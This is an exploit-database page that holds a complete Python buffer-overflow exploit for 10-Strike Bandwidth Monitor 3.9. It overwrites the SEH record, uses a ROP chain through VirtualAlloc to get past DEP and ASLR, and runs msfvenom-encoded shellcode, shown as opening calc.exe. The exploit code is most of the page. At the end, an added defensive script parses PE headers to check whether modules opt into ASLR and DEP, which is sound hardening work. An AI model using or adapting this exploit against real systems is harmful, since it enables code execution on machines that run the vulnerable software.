0day.today - Biggest Exploit Database in the World.
10-Strike Bandwidth Monitor 3.9 Buffer Overflow Exploit
#!/usr/bin/env python3
# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address
#    located in the [BandMonitor.exe] memory-space, as it was not compiled with the SafeSEH protection.
# 2. The Stack-Pivot will land in a RET Sled, as the process's offset on the Stack is different every time.
#    - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Prevention (DEP) using
#    Return-Oriented Programming (ROP), choosing Gadgets from [ssleay32.dll], [BandMonitor.exe], and
#    [LIBEAY32.dll], as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module.
#    Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings >
#   Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
#
# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False  | True    | False | False    | False  | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False  | False   | False | False    | False  | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False  | True    | False | False    | False  | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------

import struct

# Padding before the RET sled; the stack pivot lands somewhere inside the sled (offset varies per run)
OS_retSled = b'\x41' * 400
retSled = b'\x24\x01\x06\x11' * 100  # 0x11060124 : retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}

# Register / stack state at the moment of the VirtualAlloc call (debugger output):
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....


def createRopChain():
    # rop chain generated with mona.py - www.corelan.be
    ropGadgets = [
        0x1202ef02,  # POP EBP # RETN [ssleay32.dll]
        0x1202ef02,  # skip 4 bytes [ssleay32.dll]
        0x01215f16,  # POP EBX # RETN [BandMonitor.exe]
        0xffffffff,  # EBX = -1, incremented twice below to reach 1 (Size)
        0x012175f5,  # INC EBX # RETN [BandMonitor.exe]
        0x01056ff7,  # INC EBX # RETN [BandMonitor.exe]
        0x011e94d4,  # POP EDX # RETN [BandMonitor.exe]
        0xffffefff,  # Value to negate, destination value : 0x00001000
        0x01218952,  # NEG EDX # RETN [BandMonitor.exe]
        0x011ead1b,  # DEC EDX # RETN [BandMonitor.exe]
        0x110c5b5e,  # POP ECX # RETN [LIBEAY32.dll]
        0xffffffff,  # ECX = -1, incremented 65 times below to reach 0x40 (PAGE_EXECUTE_READWRITE)
        0x11016023,  # INC ECX # RETN [LIBEAY32.dll]
    ]
    ropGadgets += [0x1101597d] * 64  # INC ECX # RETN [LIBEAY32.dll]  (64 identical gadgets)
    ropGadgets += [
        0x1202fe55,  # POP EDI # RETN [ssleay32.dll]
        0x01225803,  # RETN (ROP NOP) [BandMonitor.exe]
        0x1105ed16,  # POP ESI # RETN [LIBEAY32.dll]
        0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
        0x012126f5,  # POP EAX # RETN [BandMonitor.exe]
        0x110e7198,  # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
        0x110762c4,  # PUSHAD # RETN [LIBEAY32.dll]
        0x110843b4,  # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]
    return b''.join(struct.pack('<I', g) for g in ropGadgets)


ropChain = createRopChain()
nopSled = b'\x90' * 100

# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"

# Filler up to the SEH record, sized so the SEH overwrite lands at the same offset regardless of chain length
OS_nSEH = b'\x43' * (4188 - 600 - 200 - len(ropChain + nopSled + shellcode))
nSEH = b'\x44' * 4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = b'\x70\x28\x21\x01'  # 0x01212870 : {pivot 2064 / 0x810}
extra = b'\x44' * 2000

buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra

File = 'poc.txt'
try:
    payload = buffer
    with open(File, 'wb') as f:
        f.write(payload)
    print(File + " created successfully")
except OSError as err:
    print(File + ' failed to create: ' + str(err))

# 0day.today [2024-11-16] #
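The module table in the exploit header is mona.py output: the chain works because the three modules opt out of ASLR and DEP. As an added defender-side example (not part of the original exploit, and not 10-Strike's or mona's code), the script below reads the DllCharacteristics field of a PE's optional header and reproduces the "ASLR" (DYNAMIC_BASE) and "NXCompat" (NX_COMPAT) columns, so a product's shipped modules can be audited for the same weakness before release. The sample PE header is constructed inline for the offline demo; SafeSEH lives in the Load Config directory and is not parsed here.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification (winnt.h)
HIGH_ENTROPY_VA = 0x0020   # 64-bit ASLR with high entropy
DYNAMIC_BASE = 0x0040      # image can be relocated: ASLR opt-in (mona's "ASLR" column)
NX_COMPAT = 0x0100         # image is DEP-compatible (mona's "NXCompat" column)
GUARD_CF = 0x4000          # Control Flow Guard


def pe_mitigations(data):
    """Parse the PE headers in `data` (file bytes) and report opt-in mitigations."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 24          # 4-byte signature + 20-byte COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 in both the PE32 and PE32+ optional header
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dllchars & DYNAMIC_BASE),
        "dep": bool(dllchars & NX_COMPAT),
        "high_entropy_va": bool(dllchars & HIGH_ENTROPY_VA),
        "cfg": bool(dllchars & GUARD_CF),
    }


def build_sample_pe(dllchars):
    """Constructed minimal PE32 header (no sections) used only for the offline demo."""
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")  # e_lfanew = 0x80
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)  # i386, 224-byte opt header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 28, 0x00400000)    # ImageBase, like BandMonitor.exe in the table
    struct.pack_into("<H", opt, 70, dllchars)      # DllCharacteristics under test
    return dos + b"PE\0\0" + coff + bytes(opt)


def audit(path):
    """Audit a real module on disk, e.g. each DLL shipped next to a product's exe."""
    with open(path, "rb") as f:
        return pe_mitigations(f.read())


if __name__ == "__main__":
    for name, flags in (("no-mitigations", 0), ("hardened", DYNAMIC_BASE | NX_COMPAT)):
        print(name, pe_mitigations(build_sample_pe(flags)))
```

A module reporting `aslr: False, dep: False` is exactly the kind of gadget source the table above lists; the fix is a rebuild with /DYNAMICBASE and /NXCOMPAT (and /SAFESEH for 32-bit), not a configuration change on the host.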